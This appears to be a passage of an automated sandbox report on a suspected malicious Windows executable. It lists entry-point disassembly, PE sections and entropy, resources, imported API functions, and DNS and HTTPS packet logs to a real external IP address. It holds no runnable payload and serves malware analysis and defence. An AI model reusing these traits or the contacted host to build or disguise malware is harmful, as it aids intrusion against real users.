mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0047C798h
call 00007F95A0DDAC81h
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
call 00007F95A0E3136Dh
mov ecx, dword ptr [00480588h]
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0047C498h]
call 00007F95A0E3136Dh
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
mov byte ptr [eax+5Bh], 00000000h
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
call 00007F95A0E313D6h
call 00007F95A0DD89B1h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85000	0x2af8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0x3f87c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x79f0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x89000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x85804	0x6b0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7ba00	0x7ba00	False	0.527276605157	data	6.56483916591	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext	0x7d000	0x90c	0xa00	False	0.570703125	data	5.87539197111	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x7e000	0x2628	0x2800	False	0.41904296875	data	4.25537935929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0x81000	0x37a4	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x85000	0x2af8	0x2c00	False	0.3154296875	data	4.92302569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x88000	0x34	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x89000	0x18	0x200	False	0.05078125	data	0.210826267787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x79f0	0x7a00	False	0.617379610656	data	6.69027870105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x92000	0x3f87c	0x3fa00	False	0.327319192043	data	5.46987141328	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x92864	0x134	data	English	United States
RT_CURSOR	0x92998	0x134	data	English	United States
RT_CURSOR	0x92acc	0x134	data	English	United States
RT_CURSOR	0x92c00	0x134	data	English	United States
RT_CURSOR	0x92d34	0x134	data	English	United States
RT_CURSOR	0x92e68	0x134	data	English	United States
RT_CURSOR	0x92f9c	0x134	data	English	United States
RT_ICON	0x930d0	0x94a8	data	English	United States
RT_MENU	0x9c578	0x20	data	English	United States
RT_DIALOG	0x9c598	0x52	data
RT_DIALOG	0x9c5ec	0x52	data
RT_STRING	0x9c640	0x3d4	data
RT_STRING	0x9ca14	0x344	data
RT_STRING	0x9cd58	0xa0	data
RT_STRING	0x9cdf8	0xdc	data
RT_STRING	0x9ced4	0x100	data
RT_STRING	0x9cfd4	0x434	data
RT_STRING	0x9d408	0x390	data
RT_STRING	0x9d798	0x370	data
RT_STRING	0x9db08	0x3cc	data
RT_STRING	0x9ded4	0x214	data
RT_STRING	0x9e0e8	0xcc	data
RT_STRING	0x9e1b4	0x194	data
RT_STRING	0x9e348	0x3c4	data
RT_STRING	0x9e70c	0x338	data
RT_STRING	0x9ea44	0x294	data
RT_RCDATA	0x9ecd8	0x10	data
RT_RCDATA	0x9ece8	0x2c67b	PC bitmap, Windows 3.x format, 225 x 225 x 4	English	United States
RT_RCDATA	0xcb364	0x719	Delphi compiled form 'TForm1'
RT_RCDATA	0xcba80	0x5d5a	Delphi compiled form 'TScreenLogoFrm'
RT_GROUP_CURSOR	0xd17dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd17f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1804	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1818	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd182c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1840	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1854	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xd1868	0x14	data	English	United States

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCPenColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
winspool.drv	OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 12:32:26.260426044 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.314181089 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.314333916 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.331393003 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.383546114 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.384655952 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.384680033 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.384752989 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.384779930 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.491626978 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.543354988 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.543982029 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.544121027 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.558073997 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.609582901 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632882118 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632906914 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632919073 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632930994 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632946968 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632963896 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632980108 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.632997036 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.633035898 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.633142948 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.633516073 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.633536100 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.633605003 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.633660078 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.634742975 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.634768963 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.634816885 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.634835958 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.635955095 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.635981083 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.636025906 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.636063099 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.637156010 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.637181044 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.637243032 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.637279987 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.638412952 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.638437986 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.638489962 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.638515949 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.639610052 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.639636040 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.639688969 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.639751911 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.640820026 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.640850067 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.640894890 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.640919924 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.641535997 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.641664982 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.642024994 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.642046928 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.642086029 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.642108917 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.643269062 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.643296003 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.643335104 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.643362999 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.644517899 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.644541025 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.644566059 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.644597054 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.645703077 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.645728111 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.645750999 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.645772934 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.646943092 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.646965981 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.647006989 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.647027969 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.648140907 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.648216963 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.659225941 CEST	49740	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.686031103 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.686067104 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.686124086 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.686147928 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.686562061 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.686589003 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.686615944 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.686640978 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.687784910 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.687810898 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.687854052 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.687891960 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.688985109 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.689008951 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.689054966 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.689089060 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.690217972 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.690243959 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.690263987 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.690287113 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.691436052 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.691462994 CEST	443	49739	162.159.134.233	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 12:32:17.199568033 CEST	62389	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:17.248075962 CEST	53	62389	8.8.8.8	192.168.2.4
May 4, 2021 12:32:17.290143013 CEST	49910	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:17.341527939 CEST	53	49910	8.8.8.8	192.168.2.4
May 4, 2021 12:32:19.044538975 CEST	55854	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:19.097281933 CEST	53	55854	8.8.8.8	192.168.2.4
May 4, 2021 12:32:19.849503040 CEST	64549	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:19.898332119 CEST	53	64549	8.8.8.8	192.168.2.4
May 4, 2021 12:32:20.972541094 CEST	63153	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:21.021675110 CEST	53	63153	8.8.8.8	192.168.2.4
May 4, 2021 12:32:22.408405066 CEST	52991	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:22.468358040 CEST	53	52991	8.8.8.8	192.168.2.4
May 4, 2021 12:32:23.822503090 CEST	53700	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:23.873940945 CEST	53	53700	8.8.8.8	192.168.2.4
May 4, 2021 12:32:25.636130095 CEST	51726	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:25.687604904 CEST	53	51726	8.8.8.8	192.168.2.4
May 4, 2021 12:32:26.188683987 CEST	56794	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:26.247744083 CEST	53	56794	8.8.8.8	192.168.2.4
May 4, 2021 12:32:26.719970942 CEST	56534	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:26.768537998 CEST	53	56534	8.8.8.8	192.168.2.4
May 4, 2021 12:32:28.173047066 CEST	56627	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:28.224559069 CEST	53	56627	8.8.8.8	192.168.2.4
May 4, 2021 12:32:29.364722013 CEST	56621	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:29.413427114 CEST	53	56621	8.8.8.8	192.168.2.4
May 4, 2021 12:32:30.472744942 CEST	63116	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:30.521408081 CEST	53	63116	8.8.8.8	192.168.2.4
May 4, 2021 12:32:31.669836044 CEST	64078	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:31.719865084 CEST	53	64078	8.8.8.8	192.168.2.4
May 4, 2021 12:32:32.635464907 CEST	64801	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:32.685698032 CEST	53	64801	8.8.8.8	192.168.2.4
May 4, 2021 12:32:33.739288092 CEST	61721	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:33.787842035 CEST	53	61721	8.8.8.8	192.168.2.4
May 4, 2021 12:32:34.505415916 CEST	51255	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:34.556938887 CEST	53	51255	8.8.8.8	192.168.2.4
May 4, 2021 12:32:35.534353018 CEST	61522	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:35.585870981 CEST	53	61522	8.8.8.8	192.168.2.4
May 4, 2021 12:32:37.492779016 CEST	52337	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:37.551907063 CEST	53	52337	8.8.8.8	192.168.2.4
May 4, 2021 12:32:38.628535032 CEST	55046	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:38.677088976 CEST	53	55046	8.8.8.8	192.168.2.4
May 4, 2021 12:32:39.481079102 CEST	49612	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:39.531080008 CEST	53	49612	8.8.8.8	192.168.2.4
May 4, 2021 12:32:46.716998100 CEST	49285	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:46.768604040 CEST	53	49285	8.8.8.8	192.168.2.4
May 4, 2021 12:32:51.908709049 CEST	50601	53	192.168.2.4	8.8.8.8
May 4, 2021 12:32:51.971647978 CEST	53	50601	8.8.8.8	192.168.2.4
May 4, 2021 12:33:12.303430080 CEST	60875	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:12.364641905 CEST	53	60875	8.8.8.8	192.168.2.4
May 4, 2021 12:33:13.272196054 CEST	56448	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:13.333528042 CEST	53	56448	8.8.8.8	192.168.2.4
May 4, 2021 12:33:14.214854002 CEST	59172	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:14.271964073 CEST	53	59172	8.8.8.8	192.168.2.4
May 4, 2021 12:33:15.541210890 CEST	62420	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:15.598345041 CEST	53	62420	8.8.8.8	192.168.2.4
May 4, 2021 12:33:16.093295097 CEST	60579	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:16.142273903 CEST	53	60579	8.8.8.8	192.168.2.4
May 4, 2021 12:33:16.670310020 CEST	50183	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:16.733364105 CEST	53	50183	8.8.8.8	192.168.2.4
May 4, 2021 12:33:17.293353081 CEST	61531	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:17.350528002 CEST	53	61531	8.8.8.8	192.168.2.4
May 4, 2021 12:33:17.833003998 CEST	49228	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:17.890403986 CEST	53	49228	8.8.8.8	192.168.2.4
May 4, 2021 12:33:18.601878881 CEST	59794	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:18.659068108 CEST	53	59794	8.8.8.8	192.168.2.4
May 4, 2021 12:33:19.836004972 CEST	55916	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:19.892992973 CEST	53	55916	8.8.8.8	192.168.2.4
May 4, 2021 12:33:20.525589943 CEST	52752	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:20.583003044 CEST	53	52752	8.8.8.8	192.168.2.4
May 4, 2021 12:33:20.607251883 CEST	60542	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:20.669703007 CEST	53	60542	8.8.8.8	192.168.2.4
May 4, 2021 12:33:24.845662117 CEST	60689	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:24.909626007 CEST	53	60689	8.8.8.8	192.168.2.4
May 4, 2021 12:33:50.169877052 CEST	64206	53	192.168.2.4	8.8.8.8
May 4, 2021 12:33:50.233441114 CEST	53	64206	8.8.8.8	192.168.2.4
